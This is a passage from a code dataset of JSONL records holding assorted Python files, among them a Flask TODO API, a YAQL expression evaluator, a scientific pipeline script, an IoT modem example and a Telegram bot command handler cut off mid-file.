OpenGL\n\n\ndef main():\n # Initialize the library\n if not glfw.init():\n return\n # Create a windowed mode window and its OpenGL context\n window = glfw.create_window(640, 480, \"My Window\", None, None)\n if not window:\n glfw.terminate()\n return\n\n # Make the window's context current\n glfw.make_context_current(window)\n\n # Loop until the user closes the window\n while not glfw.window_should_close(window):\n # Render here, e.g. using pyOpenGL\n\n # Swap front and back buffers\n glfw.swap_buffers(window)\n\n # Poll for and process events\n glfw.poll_events()\n\n glfw.terminate()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"glfw_example/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"291169126","text":"import helper\nimport pymongo\nimport bson\nfrom flask import Flask, request, Response\nimport json\nfrom bson import json_util\n\napp = Flask(__name__)\n\n@app.route('/')\ndef welcome():\n return 'Welcome to the TODO app!!'\n\n@app.route('/todo/add', methods = ['POST'])\ndef create_todo():\n req_data = request.get_json()\n name = req_data[\"name\"]\n desc = req_data[\"desc\"]\n priority = req_data[\"priority\"]\n status = req_data[\"status\"]\n data = helper.add_item(name, desc, priority, status)\n if data is None:\n response = Response(\"{'error': 'Item not added - \" + name + \"'}\", status=400 , mimetype='application/json')\n return response\n \n response = Response(json.loads(data), mimetype='application/json')\n\n return response\n \n@app.route('/todos/all', methods = ['GET'])\ndef get_all_items():\n client = pymongo.MongoClient(\"mongodb://127.0.0.1:27017/\")\n db = client.TODO\n \n data = list(db.todo.find())\n \n return json.dumps(data, default=json_util.default)\n\n@app.route('/todo/update', methods = ['PUT'])\ndef update_todo():\n req_data = request.get_json()\n name = req_data[\"name\"]\n status = req_data[\"status\"]\n\n data = helper.update_item(name,status)\n response = Response(json.dumps(data), mimetype='application/json')\n return response\n\n@app.route('/todo/delete', methods = ['DELETE'])\ndef delete_todo():\n req_data = request.get_json()\n name = req_data[\"name\"]\n data = helper.delete_item(name)\n response = Response(json.dumps(data), mimetype = 'application/json')\n return response\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"430668936","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 11:55:12 2019\n\n@author: lth\n\"\"\"\n\nfrom utils.anticor_script import *\nfrom Class.dataimporter import DataImporter\nfrom utils.dir import*\n\n#import dat\nheader = r'E:\\coventure\\corr_model\\data'\ndt_import = DataImporter(header)\ndt_import.importDat(r'/BTCUSD_1m.csv')\ndata1 = dt_import.getprice(60)\ndt_import.importDat(r'/ETHUSD_1m.csv')\ndata2 = dt_import.getprice(60)\n\ndat = pd.concat([data2, data1],axis =1).dropna()\ndat.columns = ['ETH','BTC']\n\n\ntrain_size = 24\ntrain_window = 96\npredict_size = 1\n#window_lst = list(range(13,21))\n#holding_lst = list(range(1,24))\nwindow_lst = list(range(13,21))\nholding_lst = list(range(1,6))\ninit_weight = np.array([0.5,0.5])\ncost = 0.01*0.5\n\n\n\nparent_path = getParent()\n \nres1 = batch_fixed (dat, train_size, window_lst, holding_lst, init_weight, cost)\ns1, d1 = res1\ncreateDir(r'\\res\\2price\\fixed')\ns1.to_csv(parent_path + r'\\res\\2price\\fixed' + r'\\sharpe.csv')\nd1.to_csv(parent_path + r'\\res\\2price\\fixed' + r'\\down.csv')\n\nres2 = batch_dynamic (dat, train_size, train_window, predict_size, \n window_lst, holding_lst, init_weight,cost)\n\ns2, d2 = res2\ncreateDir('\\res\\2price\\dynamic')\ns2.to_csv(parent_path + r'\\res\\2price\\dynamic' + r'\\sharpe.csv')\nd2.to_csv(parent_path + r'\\res\\2price\\dynamic' + r'\\down.csv')\n\n","sub_path":"main/2price.py","file_name":"2price.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"58247369","text":"#!/usr/bin/env python2.7\n\nimport os\nimport sys\nfrom run_scimes import *\nfrom calc_phys_props import *\nfrom colorcode import *\nfrom add_ltemass import add_ltemass\n\nworkdir = '../props'\nredo = 'y' # whether to regenerate dendrogram.hdf file\n\ndoclouds = ['A439', 'GMC1', 'GMC104', 'N59C', '30Dor', 'PCC']\ndolines = ['12', '13']\n\nfor cloud in doclouds:\n if cloud in ['A439', 'GMC1', 'GMC104', 'N59C']:\n type = '_12m7m'\n elif cloud == '30Dor':\n type = '21_12mAPEX'\n elif cloud == 'PCC':\n type = '21_12mTP'\n else:\n print('Unrecognized cloud!!')\n if cloud in ['A439', 'GMC1', 'GMC104', 'N59C']:\n type13 = '_12m'\n ascale = 2.5\n else:\n type13 = type\n ascale = 4\n\n for line in dolines:\n label = cloud+'_'+line\n if line == '12':\n cubefile = '../'+cloud+'_'+line+'CO'+type+'.image.fits.gz'\n mom0file = '../'+cloud+'_'+line+'CO'+type+'_dil.mom0.fits'\n else:\n cubefile = '../'+cloud+'_'+line+'CO'+type13+'.image.fits.gz'\n mom0file = '../'+cloud+'_'+line+'CO'+type13+'_dil.mom0.fits'\n\n criteria = ['volume']\n\n old_dir = os.getcwd() # returns absolute path\n if not os.path.isdir(workdir):\n os.makedirs(workdir)\n try:\n os.chdir(workdir)\n run_scimes(criteria=criteria, label=label, cubefile=cubefile, \n mom0file=mom0file, redo=redo)\n calc_phys_props(label=label, cubefile=cubefile, efloor=0.1,\n alphascale=ascale)\n colorcode(label=label, cubefile=cubefile, mom0file=mom0file, \n outdir='plots', types=['v_cen','v_rms'])\n #sys.exit(\"Stopping here\")\n finally:\n os.chdir(old_dir)\n\n","sub_path":"calling/old/doscimes_all.py","file_name":"doscimes_all.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"559245475","text":"import json\nimport sys\n\nfrom . import methods\nfrom modules.util.color import color_string, Color\nfrom modules.util.project_exception import ProjectException\nfrom modules.parse import parse, ParseException\n\n\nmethod_dict = {\n \"split_half\": (methods.split_half, \"Splitting in half\"),\n \"tangent\": (methods.tangent, \"Tangent method\"),\n \"simple_iteration\": (methods.simple_iteration, \"Simple iteration method (for systems)\")\n}\n\n\ndef solve(stream_input, stream_output):\n method_list = _get_data_from_stdin() if stream_input == sys.stdin else _get_data_from_file(stream_input)\n for m in method_list:\n if not (m[\"method\"] in method_dict.keys()):\n print(color_string(Color.RED, f\"ERROR >> Method '{m['method']}' not found.\"))\n try:\n # TODO parse output to user stdout (global function, not only for lab 2)\n result = method_dict[m[\"method\"]][0](m)\n stream_output.write(json.dumps(result) + \"\\n\")\n except ProjectException as e:\n print(e)\n return\n\n\ndef _get_data_from_file(stream_input):\n data = json.loads(\" \".join(line.strip() for line in stream_input.readlines()))\n for i in range(len(data)):\n try:\n equation_list = data[i][\"equation\"]\n var_lst = set()\n for j in range(len(equation_list)):\n data[i][\"equation\"], var_cur_lst = parse.parse_expression(equation_list[j])\n var_lst |= var_cur_lst\n data[i][\"var_lst\"] = var_lst\n except ParseException as e:\n print(color_string(Color.RED, e))\n print(color_string(Color.RED, f\"ERROR >> Invalid user input in index {i} method in list. Skipping.\"))\n data.pop(i)\n return data\n\n\ndef _get_data_from_stdin():\n data = []\n while True:\n data.append(dict())\n data[len(data) - 1][\"method\"] = _get_data_from_stdin_method()\n method = method_dict[data[len(data) - 1][\"method\"]][0]\n data[len(data) - 1][\"equation\"], var_list = _get_data_from_stdin_equation(method)\n data[len(data) - 1][\"data\"] = _get_data_from_stdin_data(var_list, method)\n data[len(data) - 1][\"var_list\"] = var_list\n if (input(\"Finish input? Y/N: \").strip().lower() == \"y\"):\n break\n return data\n\n\ndef _get_data_from_stdin_method():\n method_dict_keys = list(method_dict.keys())\n for i in range(len(method_dict_keys)):\n print(f\"{i + 1}) {method_dict[method_dict_keys[i]][1]}\")\n while True:\n try:\n number = int(input(\"Choose the method number: \")) - 1\n if not (0 <= number < len(method_dict_keys)):\n raise ValueError()\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n return method_dict_keys[number]\n\n\ndef _get_data_from_stdin_equation(function):\n var_set = set()\n equation_list = list()\n\n if (function == methods.simple_iteration):\n while True:\n try:\n count = int(input(\"Enter the number of equations: \"))\n if (count <= 0):\n raise ValueError()\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n else:\n count = 1\n\n for _ in range(count):\n while True:\n try:\n node, var_list = parse.parse_expression(input(\"Equation: \").strip())\n equation_list.append(node)\n current_set = var_set | set(var_list)\n if (len(current_set) > count):\n raise ValueError(\"Too much variables, try again.\")\n var_set = current_set\n break\n except ParseException as e:\n print(color_string(Color.RED, e))\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n except ValueError as e:\n print(e)\n return (equation_list, list(var_set))\n\n\ndef _get_data_from_stdin_data(var_list: list, function):\n _get_data_from_stdin_data_description()\n data = {}\n # iterations\n while True:\n try:\n iterations = input(\"Enter 'iterations' or blank: \")\n if (iterations.strip() == ''):\n break\n iterations = int(iterations)\n if (iterations < 0):\n raise ValueError()\n data[\"iterations\"] = iterations\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n # range_min\n while True:\n try:\n range_min = input(\"Enter 'range_min' or blank: \")\n if (range_min.strip() == ''):\n break\n range_min = float(range_min)\n data[\"range_min\"] = range_min\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n # range_max\n while True:\n try:\n range_max = input(\"Enter 'range_max' or blank: \")\n if (range_max.strip() == ''):\n break\n range_max = float(range_max)\n data[\"range_max\"] = range_max\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input\"))\n # x_0\n if (function == methods.tangent or function == methods.simple_iteration):\n for i in range(len(var_list)):\n while True:\n try:\n var_value = float(input(f\"Enter the value for '{var_list[i]}: '\"))\n data[var_list[i]] = var_value\n break\n except ValueError:\n print(color_string(Color.RED, \"ERROR >> Invalid user input. Try again.\"))\n return data\n\n\ndef _get_data_from_stdin_data_description():\n print(\"Additional arguments: \")\n print(\"-\" * 100)\n print(\"iterations (int) - count of iterations for the method\")\n print(\"range_min (float) - minimum value of border\")\n print(\"range_max (float) - maximum value of border\")\n print(\"x_0 (dict) - values of arguments for first computation\")\n print(\"-\" * 100)\n print()\n","sub_path":"Year-2/Computational-math/src/labs/lab_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204171881","text":"''' List of constants necessary for the project. '''\n\n# Name of the Slack bot.\nBOT_NAME = 'queuebot'\n# Command to list the available commands and how to use them.\nHELP_COMMAND = \"/help\"\n# Command to create/modify the queue.\nSET_QUEUE_COMMAND = \"/set\"\n# Command to cancel current queue.\nCANCEL_QUEUE_COMMAND = \"/cancel\"\n# Command to deque an item.\nCALL_QUEUE_COMMAND = \"/next\"\n# Delay between rtm reads.\nREAD_WEBSOCKET_DELAY = 1\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"493046029","text":"\"\"\"\n@author : Jeevesh Juneja \n(https://github.com/Jeevesh8/)\n\"\"\"\nimport os\nimport pickle\nimport fileinput\n\n\ndef write_files(device_feed_dic=None, initial_device_states=None) :\n if device_feed_dic is not None :\n with open('device_feed_dic.pkl', 'wb+') as f :\n pickle.dump(device_feed_dic, f)\n if initial_device_states is not None :\n with open('initial_device_states.pkl', 'wb+') as f :\n pickle.dump(initial_device_states, f) \n\ndef read_files() :\n with open('device_feed_dic.pkl', 'rb') as f :\n device_feed_dic = pickle.load(f)\n with open('initial_device_states.pkl', 'rb') as f :\n initial_device_states = pickle.load(f)\n return device_feed_dic, initial_device_states \n\ntry :\n device_feed_dic, initial_device_states = read_files() \nexcept FileNotFoundError :\n device_feed_dic, initial_device_states = make_new_dic()\n\n\ndef update_device_feed_dic(device_name, new_feed_number) :\n ''' When shifting device from one switch-board to another'''\n assert(new_feed_number<=int(os.environ.get('N_FEEDS')))\n device_feed_dic[device_name] = new_feed_number\n\n\ndef add_new_device(new_device_name, new_feed_number, write=1) :\n assert(new_device_name not in device_feed_dic)\n device_feed_dic[new_device_name] = new_feed_number\n initial_device_states[new_device_name] = 0\n if write :\n write_files(device_feed_dic, initial_device_states)\n \ndef make_new_dic(files=None) :\n '''\n Input any file/stdin having \"::<0/1>\" in each line.(No space on either side of ':')\n must be element of [0,N_FEEDS-1]; <0/1> according to whether device is off or on initially.\n Makes new dictionary of format {'device_name' : feed_number}\n feed_number is string in final dictionary.\n ''' \n device_feed_dic = {}\n initial_device_states = {}\n print('Enter ::<0/1> values')\n for line in fileinput.input(files=files) :\n line = line.rstrip()\n if line=='000' : break\n new_device_name, new_feed_number, initial_state = line.split(':')\n add_new_device(new_device_name, new_feed_number, write=0)\n initial_device_states[new_device_name] = int(initial_state)\n \n write_files(device_feed_dic, initial_device_states)\n return device_feed_dic, initial_device_states","sub_path":"device_feed_map.py","file_name":"device_feed_map.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"451014144","text":"\"\"\"Model class template\r\n\r\nThis module provides a template for users to implement custom models.\r\nYou can specify '--model template' to use this model.\r\nThe class name should be consistent with both the filename and its model option.\r\nThe filename should be _dataset.py\r\nThe class name should be Dataset.py\r\nIt implements a simple image-to-image translation baseline based on regression loss.\r\nGiven input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss:\r\n min_ ||netG(data_A) - data_B||_1\r\nYou need to implement the following functions:\r\n : Add model-specific options and rewrite default values for existing options.\r\n <__init__>: Initialize this model class.\r\n : Unpack input dataset and perform dataset pre-processing.\r\n : Run forward pass. This will be called by both and .\r\n : Update network weights; it will be called in every training iteration.\r\n\"\"\"\r\nimport torch\r\nfrom .base_model import BaseModel\r\nfrom . import networks\r\nimport numpy as np\r\nimport apex\r\nfrom apex import amp\r\n\r\n# Hand Pose Module 2-D\r\nclass hpm3dModel(BaseModel):\r\n @staticmethod\r\n def modify_commandline_options(parser, is_train=True):\r\n \"\"\"Add new model-specific options and rewrite default values for existing options.\r\n\r\n Parameters:\r\n parser -- the option parser\r\n is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options.\r\n\r\n Returns:\r\n the modified parser.\r\n \"\"\"\r\n parser.add_argument(\"--data_mode\", type=str, default='hpm3d')\r\n parser.add_argument(\"--num_loss\", type=int, default=1)\r\n return parser\r\n\r\n def __init__(self, opt):\r\n \"\"\"Initialize this model class.\r\n\r\n Parameters:\r\n opt -- training/test options\r\n\r\n A few things can be done here.\r\n - (required) call the initialization function of BaseModel\r\n - define loss function, visualization images, model names, and optimizers\r\n \"\"\"\r\n # Hpm2d.__init__(self, opt) # call the initialization method of BaseModel\r\n # specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk.\r\n super().__init__(opt)\r\n self.loss_names = ['L_z', 'null']\r\n # specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images.\r\n self.visual_names = []\r\n # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks.\r\n # you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them.\r\n self.model_names = ['Hpm3d']\r\n\r\n self.loss_null = torch.tensor(0).to(self.device)\r\n # define networks; you can use opt.isTrain to specify different behaviors for training and test.\r\n self.optimizer = torch.optim.Adam if not self.opt.distributed else apex.optimizers.FusedAdam\r\n\r\n self.networkFactory = networks.NetworkInitializer(networks=['hpm3d'],\r\n optimizers={self.optimizer: 'hpm3d'},\r\n options=opt)\r\n\r\n if self.isTrain: # only defined during training time\r\n # define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss.\r\n # We also provide a GANLoss class \"networks.GANLoss\". self.criterionGAN = networks.GANLoss().to(self.device)\r\n self.criterionLoss = torch.nn.SmoothL1Loss()\r\n [self.netHpm3d], [self.optimizer] = self.networkFactory()\r\n\r\n # define and initialize optimizers. You can define one optimizer for each network.\r\n # If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example.\r\n self.optimizers = [self.optimizer]\r\n # Our program will automatically call to define schedulers, load networks, and print networks\r\n else:\r\n [self.netHpm3d], _ = self.networkFactory()\r\n\r\n\r\n def set_input(self, input):\r\n \"\"\"Unpack input dataset from the dataloader and perform necessary pre-processing steps.\r\n\r\n Parameters:\r\n input: a dictionary that contains the dataset itself and its metadata information.\r\n \"\"\"\r\n\r\n self.heatmaps = input['A'].to(self.device) # there are 21\r\n self.ground_truth = torch.squeeze(input['B'].to(self.device), dim=-1)\r\n\r\n def forward(self):\r\n \"\"\"Run forward pass. This will be called by both functions and .\"\"\"\r\n self.output = self.netHpm3d(self.heatmaps) # generate prediction and loss\r\n\r\n def backward(self):\r\n \"\"\"\r\n Calculate losses, gradients, and update network weights.\r\n In DGGAN, this loss if L_2D using simple MSE loss\r\n Authors amply this loss by 100 and not mention it.\r\n\r\n \"\"\"\r\n self.loss_L_z = self.criterionLoss(self.output, self.ground_truth) * 10\r\n self.loss_backward(self.loss_L_z, self.optimizer)\r\n\r\n def optimize_parameters(self):\r\n \"\"\"Update network weights; it will be called in every training iteration.\"\"\"\r\n self.forward()\r\n self.optimizer.zero_grad()\r\n self.backward()\r\n self.optimizer.step()\r\n","sub_path":"hand_pose_estimators/CVPR2020_hpm3d/models/hpm3d_model.py","file_name":"hpm3d_model.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117518860","text":"from google.appengine.api import users, memcache\nfrom base import FormController\n\nimport model\n\nfrom gae_validators import validateEmail\n\nLOGOUT_URL = users.create_logout_url(\"/\")\n\n\nclass DevController(FormController):\n \"\"\" handles request for the dev page \"\"\"\n\n FIELDS = {\"email\": validateEmail}\n\n def get(self):\n\n self.renderTemplate('dev.html', logout_url=LOGOUT_URL)\n\n def post(self):\n\n if self.request.get(\"make_admin\"):\n form_data, errors, valid_data = self.validate()\n if not errors:\n user = model.User.query(model.User.email == valid_data[\"email\"]).get()\n if user:\n user.is_admin = True\n user.put()\n\n # the user may currently be signed in so invalidate its cache to get the new permissions\n self.uncache(user.key.urlsafe())\n self.flash(\"success\", \"User successfully made admin.\")\n else:\n errors[\"exists\"] = True\n if errors:\n return self.redisplay(form_data, errors)\n\n elif self.request.get(\"memcache\"):\n # clear memcache\n memcache.flush_all()\n\n self.redisplay()\n","sub_path":"controllers/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530100909","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport inspect\nimport logging\nimport re\nimport six\n\nimport yaql\nimport yaql.language.exceptions as yaql_exc\n\nfrom orquesta import exceptions as exc\nfrom orquesta.expressions import base\nfrom orquesta.expressions.functions import base as functions\nfrom orquesta.utils import expression as utils\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef register_functions(ctx):\n catalog = functions.load()\n\n for name, func in six.iteritems(catalog):\n ctx.register_function(func, name=name)\n\n return catalog\n\n\nclass YaqlGrammarException(exc.ExpressionGrammarException):\n pass\n\n\nclass YaqlEvaluationException(exc.ExpressionEvaluationException):\n pass\n\n\nclass YAQLEvaluator(base.Evaluator):\n _type = 'yaql'\n _delimiter = '<%>'\n _regex_pattern = '<%.*?%>'\n _regex_parser = re.compile(_regex_pattern)\n\n _regex_dot_pattern = '[a-zA-Z0-9_\\'\"\\.\\[\\]\\(\\)]*'\n _regex_ctx_pattern_1 = 'ctx\\(\\)\\.%s' % _regex_dot_pattern\n _regex_ctx_pattern_2 = 'ctx\\([\\'|\"]?{0}[\\'|\"]?\\)[\\.{0}]?'.format(_regex_dot_pattern)\n _regex_var_pattern = '.*?(%s|%s).*?' % (_regex_ctx_pattern_1, _regex_ctx_pattern_2)\n _regex_var_parser = re.compile(_regex_var_pattern)\n\n _regex_dot_extract = '([a-zA-Z0-9_\\-]*)'\n _regex_ctx_extract_1 = 'ctx\\(\\)\\.%s' % _regex_dot_extract\n _regex_ctx_extract_2 = 'ctx\\([\\'|\"]?%s(%s)' % (_regex_dot_extract, _regex_dot_pattern)\n _regex_var_extracts = ['%s\\.?' % _regex_ctx_extract_1, '%s\\.?' % _regex_ctx_extract_2]\n\n _engine = yaql.language.factory.YaqlFactory().create()\n _root_ctx = yaql.create_context()\n _custom_functions = register_functions(_root_ctx)\n\n @classmethod\n def contextualize(cls, data):\n ctx = cls._root_ctx.create_child_context()\n ctx['__vars'] = data or {}\n ctx['__flow'] = ctx['__vars'].get('__flow')\n ctx['__current_task'] = ctx['__vars'].get('__current_task')\n\n return ctx\n\n @classmethod\n def get_statement_regex(cls):\n return cls._regex_pattern\n\n @classmethod\n def has_expressions(cls, text):\n exprs = cls._regex_parser.findall(text)\n\n return exprs is not None and len(exprs) > 0\n\n @classmethod\n def get_var_extraction_regexes(cls):\n return cls._regex_var_extracts\n\n @classmethod\n def validate(cls, text):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n errors = []\n\n for expr in cls._regex_parser.findall(text):\n try:\n cls._engine(cls.strip_delimiter(expr))\n except (yaql_exc.YaqlException, ValueError, TypeError) as e:\n errors.append(utils.format_error(cls._type, expr, e))\n\n return errors\n\n @classmethod\n def evaluate(cls, text, data=None):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n if data and not isinstance(data, dict):\n raise ValueError('Provided data is not typeof dict.')\n\n output = text\n exprs = cls._regex_parser.findall(text)\n ctx = cls.contextualize(data)\n\n try:\n for expr in exprs:\n stripped = cls.strip_delimiter(expr)\n result = cls._engine(stripped).evaluate(context=ctx)\n\n if inspect.isgenerator(result):\n result = list(result)\n\n if isinstance(result, six.string_types):\n result = cls.evaluate(result, data)\n\n if len(exprs) > 1 or len(output) > len(expr):\n output = output.replace(expr, str(result))\n else:\n output = result\n\n except KeyError as e:\n raise YaqlEvaluationException(\n \"Unable to resolve key '%s' in expression '%s' from context.\" %\n (str(getattr(e, 'message', e)).strip(\"'\"), expr)\n )\n except (yaql_exc.YaqlException, ValueError, TypeError) as e:\n raise YaqlEvaluationException(str(getattr(e, 'message', e)).strip(\"'\"))\n\n return output\n\n @classmethod\n def extract_vars(cls, text):\n if not isinstance(text, six.string_types):\n raise ValueError('Text to be evaluated is not typeof string.')\n\n variables = []\n\n for expr in cls._regex_parser.findall(text):\n variables.extend(cls._regex_var_parser.findall(expr))\n\n return sorted(list(set(variables)))\n","sub_path":"orquesta/expressions/yql.py","file_name":"yql.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106618792","text":"###############################################################################\n# file: ex_03_get_system_info.py\n#\n# Connect to the Modem Abstraction Layer and access system and connection info\n###############################################################################\nimport iot_mal # Import the Modem Abstraction Layer (MAL) API module\n\n###############################################################################\n# function: parse_state(state)\n#\n# Parses the connection state value and returns descriptive string\n###############################################################################\ndef parse_state(state):\n if state == 0:\n ret = 'Disconnected'\n elif state == 1:\n ret = 'Disconnecting'\n elif state == 2:\n ret = 'Connecting'\n elif state == 3:\n ret = 'Connected'\n elif state == 4:\n ret = 'Disconnected, and PIN locked'\n elif state == 5:\n ret = 'Disconnected, and SIM removed'\n return ret\n\n###############################################################################\n# Main code\n###############################################################################\n\n# Setup the MAL and data connection\nnetwork_handler = iot_mal.network() # Connect to MAL.network\nnetwork_handler.set_connection_mode(\n 1, # Mode: 0 - Always, 1 - On-demand\n 10, # On-demand Timeout: Disconnect in mins if no access\n 2) # Manual Mode: 0 - Disconnect, 1 - Connect (Always/on-demand),\n # 2 - Connect once\nsystem_handler = iot_mal.system() # Connect to MAL.system\n\n# Print out system information\nfirm = system_handler.get_firmware_version().get('version')\nimei = system_handler.get_imei().get('imei')\nimsi = system_handler.get_imsi().get('imsi')\niccid = system_handler.get_iccid().get('iccid')\n\nprint('System Information')\nprint('------------------')\nprint('Firmware version: ' + firm)\nprint('IMEI : ' + imei)\nprint('IMSI : ' + imsi)\nprint('ICCID : ' + iccid)\n\n# Print out connection information\nstatus = network_handler.get_connection_status()\n\nprint('\\nConnection Information')\nprint( '----------------------')\nprint('Connection State: ' + parse_state(status.get('state')))\nprint('Connection Time : ' + status.get('connection_time'))\nprint('Radio Mode : ' + str(status.get('radio_mode')) + 'G ' + status.get('data_bearer_tech'))\nprint('My IP address : ' + status.get('ip'))\n\n# =============================================================================\n# Copyright (c) 2018, AT&T (R)\n#\n# www.att.com \n# \n# Licensed under the Apache License, Version 2.0 (the \"License\"); \n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, \n# software distributed under the License is distributed on an \n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, \n# either express or implied. See the License for the specific \n# language governing permissions and limitations under the License.\n# =============================================================================","sub_path":"Chapter_05/ex_03_get_system_info.py","file_name":"ex_03_get_system_info.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340451386","text":"import config\nimport requests\nimport re\n\nbot = config.bot\nsudos = config.sudoers\nlogs = config.logs\nbot_username = config.bot_username\n\n\ndef send_to_hastebin(text):\n post = requests.post(\"https://hastebin.com/documents\", data=text.encode('utf-8'))\n return \"https://hastebin.com/\" + post.json()[\"key\"]\n\n\ndef diversos(msg):\n if msg.get('text'):\n\n if msg['text'].startswith('/echo ') or msg['text'].startswith('!echo '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:],\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/mark ') or msg['text'].startswith('!mark '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'markdown',\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/bug') or msg['text'].startswith('!bug'):\n text = msg['text'][5:]\n if text == '' or text == bot_username:\n bot.sendMessage(msg['chat']['id'], '''*Uso:* `/bug ` - _Reporta erro/bug para minha equipe_\n obs.: Mal uso há possibilidade de ID\\_ban''', 'markdown',\n reply_to_message_id=msg['message_id'])\n else:\n bot.sendMessage(logs, '''\n{} reportou um bug\n\nID: {}\nMensagem: {}'''.format(msg['from']['id'],\n msg['from']['first_name'],\n msg['from']['id'],\n text), 'HTML')\n bot.sendMessage(msg['chat']['id'], 'O bug foi reportado com sucesso para a minha equipe!',\n reply_to_message_id=msg['message_id'])\n\n\n elif msg['text'].startswith('/html ') or msg['text'].startswith('!html '):\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'html',\n reply_to_message_id=reply_id)\n return True\n\n\n elif msg['text'].startswith('/text ') or msg['text'].startswith('!text '):\n string = ''\n text = msg['text'][6:]\n if msg.get('reply_to_message'):\n reply_id = msg['reply_to_message']['message_id']\n else:\n reply_id = None\n sent = bot.sendMessage(msg['chat']['id'], '|', 'html',\n reply_to_message_id=reply_id)\n for char in text:\n string = string + char\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+string+'', 'html')\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+string+'|', 'html')\n bot.editMessageText((msg['chat']['id'], sent['message_id']), ''+msg['text'][6:]+'', 'html')\n return True\n\n\n elif msg['text'].startswith('/request ') or msg['text'].startswith('!request '):\n if re.match(r'^(https?:\\/\\/)', msg['text'][9:]):\n text = msg['text'][9:]\n else:\n text = 'http://'+msg['text'][9:]\n try:\n res = requests.get(text).text\n except Exception as e:\n return bot.sendMessage(msg['chat']['id'], str(e),\n reply_to_message_id=msg['message_id'])\n if len(res) > 4000:\n res = send_to_hastebin(res)\n bot.sendMessage(msg['chat']['id'], '*Conteúdo:*\\n`{}`'.format(res), 'markdown',\n reply_to_message_id=msg['message_id'])\n return True\n\n\n elif msg['text'].startswith('/suco'):\n if msg['from']['id'] in sudos:\n l = '✅'\n else:\n l = '❌'\n bot.sendMessage(msg['chat']['id'], l + '🍹',\n reply_to_message_id=msg['message_id'])\n\n\n elif msg['text'].lower() == 'rt' and msg.get('reply_to_message'):\n if msg['reply_to_message']['text'].lower() != 'rt':\n if not re.match('🔃 .* retweeted:\\n\\n👤 .*', msg['reply_to_message']['text']):\n bot.sendMessage(msg['chat']['id'], '''🔃 {} retweeted:\n\n👤 {}: {}'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],\n msg['reply_to_message']['text']), 'HTML',\n 